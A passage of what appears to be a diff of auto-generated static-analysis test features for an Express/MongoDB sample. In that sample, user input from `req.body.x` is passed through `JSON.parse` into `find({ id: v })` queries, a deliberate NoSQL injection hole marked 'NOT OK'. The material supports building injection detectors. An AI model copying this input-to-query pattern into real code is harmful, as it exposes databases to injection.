getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:25:12:27 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:25:12:27 | res | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:7:13:7 | v | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:7:13:7 | v | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:7:13:7 | v | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:7:13:7 | v | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:7:13:7 | v | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:7:13:32 | v | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:7:13:32 | v | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:7:13:32 | v | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:7:13:32 | v | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:7:13:32 | v | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:7:13:32 | v = JSO ... body.x) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:7:13:32 | v = JSO ... body.x) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:7:13:32 | v = JSO ... body.x) | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:7:13:32 | v = JSO ... body.x) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:7:13:32 | v = JSO ... body.x) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:14 | JSON | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:14 | JSON | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:14 | JSON | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:14 | JSON | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:14 | JSON | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:20 | JSON.parse | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:20 | JSON.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:20 | JSON.parse | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:20 | JSON.parse | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:20 | JSON.parse | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:32 | JSON.pa ... body.x) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:32 | JSON.pa ... body.x) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:32 | JSON.pa ... body.x) | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:32 | JSON.pa ... body.x) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:32 | JSON.pa ... body.x) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:32 | exceptional return of JSON.pa ... body.x) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:32 | exceptional return of JSON.pa ... body.x) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:32 | exceptional return of JSON.pa ... body.x) | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:32 | exceptional return of JSON.pa ... body.x) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:11:13:32 | exceptional return of JSON.pa ... body.x) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:16:13:20 | parse | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:16:13:20 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:16:13:20 | parse | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:16:13:20 | parse | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:16:13:20 | parse | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:22:13:24 | req | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:22:13:24 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:22:13:24 | req | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:22:13:24 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:22:13:24 | req | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:22:13:29 | req.body | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:22:13:29 | req.body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:22:13:29 | req.body | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:22:13:29 | req.body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:22:13:29 | req.body | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:22:13:31 | req.body.x | CalleeFlexibleAccessPath | JSON.parse | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:22:13:31 | req.body.x | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:22:13:31 | req.body.x | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | @@ -38,6 +328,51 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:22:13:31 | req.body.x | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:22:13:31 | req.body.x | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:22:13:31 | req.body.x | receiverName | JSON | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:26:13:29 | body | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:26:13:29 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:26:13:29 | body | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:26:13:29 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:26:13:29 | body | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:31:13:31 | x | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:31:13:31 | x | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:31:13:31 | x | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:31:13:31 | x | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:13:31:13:31 | x | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:15 | getCollection | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:15 | getCollection | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:15 | getCollection | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:15 | getCollection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:15 | getCollection | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:17 | exceptional return of getCollection() | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:17 | exceptional return of getCollection() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:17 | exceptional return of getCollection() | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:17 | exceptional return of getCollection() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:17 | exceptional return of getCollection() | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:17 | getCollection() | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:17 | getCollection() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:17 | getCollection() | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:17 | getCollection() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:17 | getCollection() | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:22 | getCollection().find | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:22 | getCollection().find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:22 | getCollection().find | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:22 | getCollection().find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:22 | getCollection().find | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:33 | exceptional return of getColl ... d: v }) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:33 | exceptional return of getColl ... d: v }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:33 | exceptional return of getColl ... d: v }) | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:33 | exceptional return of getColl ... d: v }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:33 | exceptional return of getColl ... d: v }) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:33 | getColl ... d: v }) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:33 | getColl ... d: v }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:33 | getColl ... d: v }) | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:33 | getColl ... d: v }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:3:14:33 | getColl ... d: v }) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:19:14:22 | find | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:19:14:22 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:19:14:22 | find | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:19:14:22 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:19:14:22 | find | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:24:14:32 | { id: v } | CalleeFlexibleAccessPath | getCollection().find | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:24:14:32 | { id: v } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:24:14:32 | { id: v } | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | @@ -45,6 +380,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:24:14:32 | { id: v } | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:24:14:32 | { id: v } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:24:14:32 | { id: v } | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:26:14:27 | id | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:26:14:27 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:26:14:27 | id | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:26:14:27 | id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:26:14:27 | id | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:26:14:30 | id: v | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:26:14:30 | id: v | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:26:14:30 | id: v | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:26:14:30 | id: v | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:26:14:30 | id: v | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:26:14:30 | id: v | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:26:14:30 | id: v | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:26:14:30 | id: v | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:26:14:30 | id: v | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:26:14:30 | id: v | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:30:14:30 | v | CalleeFlexibleAccessPath | getCollection().find | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:30:14:30 | v | InputAccessPathFromCallee | 0.id | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:30:14:30 | v | InputArgumentIndex | 0 | @@ -54,6 +404,60 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:30:14:30 | v | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:30:14:30 | v | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:30:14:30 | v | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:17:8:17:20 | * as mongoose | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:17:8:17:20 | * as mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:17:8:17:20 | * as mongoose | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:17:13:17:20 | mongoose | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:17:13:17:20 | mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:17:13:17:20 | mongoose | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:17:27:17:36 | "mongoose" | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:17:27:17:36 | "mongoose" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:17:27:17:36 | "mongoose" | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:18:1:18:52 | 'arguments' object of function getMongooseModel | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:18:1:18:52 | 'arguments' object of function getMongooseModel | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:18:1:18:52 | 'arguments' object of function getMongooseModel | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:18:1:18:52 | declare ... .Model; | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:18:1:18:52 | declare ... .Model; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:18:1:18:52 | declare ... .Model; | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:18:1:18:52 | exceptional return of function getMongooseModel | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:18:1:18:52 | exceptional return of function getMongooseModel | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:18:1:18:52 | exceptional return of function getMongooseModel | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:18:1:18:52 | return of function getMongooseModel | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:18:1:18:52 | return of function getMongooseModel | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:18:1:18:52 | return of function getMongooseModel | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:18:18:18:33 | getMongooseModel | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:18:18:18:33 | getMongooseModel | contextSurroundingFunctionParameters | () | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:18:18:18:33 | getMongooseModel | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:19:1:19:52 | 'arguments' object of function getMongooseQuery | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:19:1:19:52 | 'arguments' object of function getMongooseQuery | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:19:1:19:52 | 'arguments' object of function getMongooseQuery | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:19:1:19:52 | declare ... .Query; | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:19:1:19:52 | declare ... .Query; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:19:1:19:52 | declare ... .Query; | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:19:1:19:52 | exceptional return of function getMongooseQuery | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:19:1:19:52 | exceptional return of function getMongooseQuery | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:19:1:19:52 | exceptional return of function getMongooseQuery | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:19:1:19:52 | return of function getMongooseQuery | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:19:1:19:52 | return of function getMongooseQuery | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:19:1:19:52 | return of function getMongooseQuery | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:19:18:19:33 | getMongooseQuery | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:19:18:19:33 | getMongooseQuery | contextSurroundingFunctionParameters | () | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:19:18:19:33 | getMongooseQuery | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:1:20:3 | app | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:1:20:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:1:20:3 | app | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:1:20:8 | app.post | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:1:20:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:1:20:8 | app.post | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:1:24:2 | app.pos ... T OK\\n}) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:1:24:2 | app.pos ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:1:24:2 | app.pos ... T OK\\n}) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:1:24:2 | exceptional return of app.pos ... T OK\\n}) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:1:24:2 | exceptional return of app.pos ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:1:24:2 | exceptional return of app.pos ... T OK\\n}) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:5:20:8 | post | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:5:20:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:5:20:8 | post | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:10:20:16 | "/find" | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:10:20:16 | "/find" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:10:20:16 | "/find" | calleeImports | express | @@ -61,6 +465,11 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:10:20:16 | "/find" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:10:20:16 | "/find" | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:10:20:16 | "/find" | receiverName | app | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | 'arguments' object of anonymous function | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | (req, r ... OT OK\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | (req, r ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | (req, r ... OT OK\\n} | calleeImports | express | @@ -68,6 +477,81 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | (req, r ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | (req, r ... OT OK\\n} | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | (req, r ... OT OK\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | exceptional return of anonymous function | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | exceptional return of anonymous function | 